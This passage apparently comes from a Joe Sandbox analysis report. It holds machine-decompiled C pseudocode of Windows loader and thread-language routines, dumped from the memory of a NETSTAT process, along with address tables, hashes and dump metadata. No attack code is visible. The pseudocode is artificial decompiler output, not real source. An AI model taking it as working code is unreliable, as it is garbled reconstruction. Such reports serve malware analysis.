												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E02E82280(_t250, 0x2f584d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L02EA3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E02E7FFB0(_t293, _t353, 0x2f584d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E02EA37F5(_t353, 0);
																}
																E02EA0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E02E99B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E02E902D6(_t174);
																}
																L02E877F0( *0x2f57b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E02E9C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L02E7EC7F(_t353);
										L02E919B8(_t287, 0, _t353, 0);
										_t200 = E02E6F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E02EAB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x2f5b2f8; // 0x7f0000
									if((_t206 |  *0x2f5b2fc) == 0 || ( *0x2f5b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x2f5b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E02F16B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E02F16AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E02E7E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L02E7EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E02EA9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E02E7E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L02E78F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02EA3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x02e7d5f2
0x02e7d5f5
0x02e7d5f5
0x02e7d5fd
0x02e7d600
0x02e7d60a
0x02e7d60d
0x02e7d617
0x02e7d61d
0x02e7d627
0x02e7d62e
0x02e7d911
0x02e7d913
0x00000000
0x02e7d919
0x02e7d919
0x02e7d919
0x02e7d634
0x02e7d634
0x02e7d634
0x02e7d634
0x02e7d640
0x02e7d8bf
0x00000000
0x02e7d646
0x02e7d646
0x02e7d64d
0x02e7d652
0x02ecb2fc
0x02ecb2fc
0x02ecb302
0x02ecb33b
0x02ecb341
0x00000000
0x02ecb304
0x02ecb304
0x02ecb319
0x02ecb31e
0x02ecb324
0x02ecb326
0x02ecb332
0x02ecb347
0x02ecb34c
0x02ecb351
0x02ecb35a
0x00000000
0x02ecb328
0x02ecb328
0x00000000
0x02ecb328
0x02ecb326
0x02e7d658
0x02e7d658
0x02e7d65b
0x02e7d665
0x00000000
0x02e7d66b
0x02e7d66b
0x02e7d66b
0x02e7d66b
0x02e7d66d
0x02e7d672
0x02e7d67a
0x00000000
0x00000000
0x02e7d680
0x02e7d686
0x02e7d8ce
0x02e7d8d4
0x02e7d8da
0x02e7d8dd
0x02e7d8dd
0x02e7d8e0
0x02e7d68c
0x02e7d691
0x02e7d69d
0x02e7d6a2
0x02e7d6a7
0x02e7d6b0
0x02e7d6b0
0x02e7d6b5
0x02e7d6e0
0x02e7d6b7
0x02e7d6b7
0x02e7d6b9
0x02e7d6b9
0x02e7d6bb
0x02e7d6bd
0x02e7d6ce
0x02e7d6d0
0x02e7d6d2
0x02ecb363
0x02ecb365
0x00000000
0x02ecb36b
0x00000000
0x02ecb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02e7d6bf
0x02e7d6bf
0x02e7d6e5
0x02e7d6e7
0x02e7d6e9
0x02e7d6e9
0x02e7d6ec
0x02e7d6ec
0x02e7d6ef
0x02e7d6f5
0x02e7d6f9
0x02e7d6fb
0x02e7d6fd
0x02e7d701
0x02e7d703
0x02e7d70a
0x02e7d70a
0x02e7d70a
0x02e7d701
0x02e7d70d
0x02e7d710
0x02e7d710
0x02e7d6c1
0x02e7d6c1
0x02e7d6c1
0x02e7d6c6
0x02ecb36d
0x02ecb36f
0x00000000
0x02ecb375
0x02ecb375
0x02ecb375
0x00000000
0x02ecb375
0x00000000
0x02e7d6cc
0x02e7d6d8
0x02e7d6d8
0x02e7d6d8
0x00000000
0x02e7d6c6
0x02e7d6bf
0x00000000
0x02e7d6da
0x02e7d6da
0x02e7d716
0x02e7d71b
0x02e7d720
0x02e7d726
0x02e7d726
0x02e7d72d
0x00000000
0x02e7d733
0x02e7d739
0x02e7d742
0x02e7d750
0x02e7d758
0x02e7d764
0x02e7d776
0x02e7d77a
0x02e7d783
0x02e7d928
0x02e7d92c
0x02e7d93d
0x02e7d944
0x02e7d94f
0x02e7d954
0x02e7d956
0x02e7d95f
0x02e7d961
0x02e7d973
0x02e7d973
0x02e7d956
0x02e7d944
0x02e7d92c
0x02e7d78b
0x02ecb394
0x02e7d791
0x02e7d798
0x02ecb3a3
0x02ecb3bb
0x02ecb3bb
0x02e7d7a5
0x02e7d866
0x02e7d870
0x02e7d884
0x02e7d892
0x02e7d898
0x02e7d89e
0x02e7d8a0
0x02e7d8a6
0x02e7d8ac
0x02e7d8ae
0x02e7d8b4
0x02e7d8b4
0x02e7d8ae
0x02e7d7a5
0x02e7d78b
0x02e7d7b1
0x02ecb3c5
0x02ecb3c5
0x02e7d7c3
0x02e7d7ca
0x02e7d7e5
0x02e7d7eb
0x02e7d8eb
0x02e7d8ed
0x00000000
0x02e7d8f3
0x02e7d8f3
0x02e7d8f3
0x00000000
0x02e7d8ed
0x02e7d7cc
0x02e7d7cc
0x02e7d7d2
0x00000000
0x02e7d7d4
0x02e7d7d4
0x02e7d7d7
0x02e7d7df
0x02ecb3d4
0x02ecb3d9
0x02ecb3dc
0x02ecb3dc
0x02ecb3df
0x02ecb3e2
0x02ecb468
0x02ecb46d
0x02ecb46f
0x02ecb46f
0x02ecb475
0x02e7d8f8
0x02e7d8f9
0x02e7d8fd
0x02ecb3e8
0x02ecb3e8
0x02ecb3eb
0x02ecb3ed
0x00000000
0x02ecb3ef
0x02ecb3ef
0x02ecb3f1
0x02ecb3f4
0x02ecb3fe
0x02ecb404
0x02ecb409
0x02ecb40e
0x02ecb410
0x02ecb410
0x02ecb414
0x02ecb414
0x02ecb41b
0x02ecb420
0x02ecb423
0x02ecb425
0x02ecb427
0x02ecb42a
0x02ecb42d
0x02ecb42d
0x02ecb42a
0x02ecb432
0x02ecb436
0x02ecb438
0x02ecb43b
0x02ecb43b
0x02ecb449
0x02ecb44e
0x02ecb454
0x02ecb458
0x02ecb458
0x02ecb45d
0x00000000
0x02ecb45d
0x02ecb3ed
0x00000000
0x00000000
0x00000000
0x02e7d7df
0x02e7d7d2
0x02e7d7ca
0x02ecb37c
0x02ecb37e
0x02ecb385
0x02ecb38a
0x00000000
0x02ecb38a
0x02e7d742
0x02e7d7f1
0x02e7d7f8
0x02ecb49b
0x02ecb49b
0x02e7d800
0x02e7d837
0x02e7d843
0x02e7d845
0x02e7d847
0x02e7d84a
0x02e7d84b
0x02e7d84e
0x02e7d857
0x02e7d802
0x02e7d802
0x02e7d80d
0x00000000
0x02e7d818
0x02e7d818
0x02e7d824
0x02e7d831
0x02ecb4a5
0x02ecb4ab
0x02ecb4b3
0x02ecb4b8
0x02ecb4bb
0x00000000
0x02ecb4c1
0x02ecb4c1
0x02ecb4c8
0x00000000
0x02ecb4ce
0x02ecb4d4
0x02ecb4e1
0x02ecb4e3
0x02ecb4e5
0x00000000
0x02ecb4eb
0x02ecb4f0
0x02ecb4f2
0x02e7dac9
0x02e7dacc
0x02e7dacf
0x02e7dad1
0x02e7dd78
0x02e7dd78
0x02e7dcf2
0x00000000
0x02e7dad7
0x02e7dad9
0x02e7dadb
0x00000000
0x00000000
0x02e7dae1
0x02e7dae1
0x02e7dae4
0x02e7dae6
0x02ecb4f9
0x02ecb4f9
0x02ecb500
0x02e7daec
0x02e7daec
0x02e7daf5
0x02e7daf8
0x02e7dafb
0x02e7db03
0x02e7db11
0x02e7db16
0x02e7db19
0x02e7db1b
0x02ecb52c
0x02ecb531
0x02ecb534
0x02e7db21
0x02e7db21
0x02e7db24
0x02e7dcd9
0x02e7dce2
0x02e7dce5
0x02e7dd6a
0x02e7dd6d
0x00000000
0x02e7dd73
0x02ecb51a
0x02ecb51c
0x02ecb51f
0x02ecb524
0x00000000
0x02ecb524
0x02e7dce7
0x02e7dce7
0x02e7dce7
0x00000000
0x02e7dce7
0x00000000
0x02e7db2a
0x02e7db2c
0x02e7db31
0x02e7db33
0x02e7db36
0x02e7db39
0x02e7db3b
0x02e7db66
0x02e7db66
0x02e7db3d
0x02e7db3d
0x02e7db3e
0x02e7db46
0x02e7db47
0x02e7db49
0x02e7db4c
0x02e7db53
0x02e7db55
0x02e7db58
0x02e7db5a
0x02ecb50a
0x02ecb50f
0x02ecb512
0x02e7db60
0x02e7db60
0x02e7db63
0x02e7db63
0x00000000
0x02e7db63
0x02e7db5a
0x02e7db3b
0x02e7db24
0x02e7db69
0x02e7db69
0x02e7db6c
0x02e7db6f
0x02e7db74
0x02ecb557
0x02ecb557
0x02ecb55e
0x02e7db7a
0x02e7db7c
0x02e7db7f
0x02e7db82
0x02e7db85
0x00000000
0x02e7db8b
0x02e7db8b
0x02e7db8d
0x02e7db9b
0x02e7db9b
0x02e7db9d
0x02e7dba0
0x02e7dba2
0x02e7dba4
0x02e7dba7
0x02e7dba9
0x02e7dbae
0x02e7dbae
0x02e7dbb1
0x02e7dbb4
0x02e7dbb4
0x02e7dbb7
0x02e7dbba
0x02e7dcd2
0x02e7dcd4
0x00000000
0x02e7dbc0
0x02e7dbc0
0x02e7dbd2
0x02e7dbd7
0x02e7dbda
0x02e7dbdd
0x02e7dbdf
0x00000000
0x02e7dbe5
0x02e7dbe5
0x02e7dbee
0x02e7dbf1
0x02ecb541
0x02ecb544
0x00000000
0x02ecb546
0x02ecb546
0x00000000
0x02ecb546
0x02e7dbf7
0x02e7dbf7
0x02e7dbfd
0x02e7dbfd
0x02e7dbff
0x02e7dc0b
0x02e7dc15
0x02e7dc1b
0x02e7dc1d
0x02e7dc21
0x02e7dc21
0x02e7dc23
0x02e7dc23
0x02e7dc26
0x02e7dc29
0x02e7dc2b
0x00000000
0x00000000
0x02e7dc31
0x02e7dc34
0x02e7dc36
0x02e7dcbf
0x02e7dcbf
0x02e7dcc2
0x00000000
0x02e7dc3c
0x02e7dc41
0x02e7dc43
0x00000000
0x02e7dc45
0x02e7dc45
0x02e7dc47
0x00000000
0x02e7dc4d
0x02e7dc4d
0x02e7dc50
0x02e7dc52
0x02e7dc55
0x02e7dcfa
0x02e7dcfe
0x02e7dd08
0x02e7dd0a
0x02e7dd0c
0x00000000
0x02e7dd12
0x02e7dd15
0x02e7dd2d
0x02e7dd2f
0x02e7dd32
0x02e7dd35
0x00000000
0x02e7dd35
0x02e7dc5b
0x02e7dc5b
0x02e7dc5e
0x02e7dc61
0x02e7dc64
0x02e7dc67
0x02e7dc67
0x02e7dc6a
0x02e7dc6c
0x02e7dc8e
0x02e7dc8e
0x02e7dc91
0x02e7dc93
0x02e7dcce
0x02e7dcce
0x02e7dc95
0x02e7dc9c
0x02e7dc6e
0x02e7dc72
0x02e7dc75
0x02e7dc77
0x02e7dc79
0x02ecb551
0x02ecb551
0x00000000
0x02e7dc7f
0x02e7dc7f
0x02e7dc81
0x00000000
0x02e7dc83
0x02e7dc86
0x02e7dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x02e7dc88
0x02e7dc81
0x02e7dc79
0x02e7dc6c
0x02e7dc55
0x02e7dc47
0x02e7dc43
0x00000000
0x02e7dc36
0x02e7dc23
0x00000000
0x02e7dbff
0x02e7dbf1
0x02e7dbdf
0x02e7db8f
0x02e7db92
0x02e7db95
0x00000000
0x00000000
0x00000000
0x00000000
0x02e7db95
0x02e7db8d
0x02e7db85
0x02e7db74
0x02e7dc9f
0x02e7dca2
0x02e7dcb0
0x02e7dcb0
0x02e7dad1
0x02ecb4e5
0x02ecb4c8
0x00000000
0x00000000
0x00000000
0x02e7d831
0x02e7d80d
0x00000000
0x02e7d800
0x02ecb47f
0x02ecb485
0x00000000
0x02ecb485
0x02e7d665
0x02e7d652
0x00000000

Strings

(2?, xrefs: 02E7D69D
)?, xrefs: 02E7D8CE

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: (2?$)?
API String ID: 0-183313369
Opcode ID: 76750aca64638f4eefc8c7bd458f407dcbd311856a308812e3dde24f27415c77
Instruction ID: 513420987ca039dedcd6cc7285eaa76b79b06b38266091bf211658389f0458c1
Opcode Fuzzy Hash: 76750aca64638f4eefc8c7bd458f407dcbd311856a308812e3dde24f27415c77
Instruction Fuzzy Hash: C2E1C230A80359CFEB24DF68CD80BA9B7B6BF4530CF14919DE9099B290D770A982CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02E9FAB0, Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02E9FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E02E7EEF0(0x2f57b60);
					_t134 =  *0x2f57b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x2f57b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2f57b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E02E76D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E02E776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E02F08938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E02E6B150();
													}
													_t116 = E02F06D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E02E775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x2f58638; // 0x0
																	_t122 = L02E738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E02E776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E02E776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L02E9FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L02E770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E02E9FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E02E9FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E02E9FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E02E9FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E02E9FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
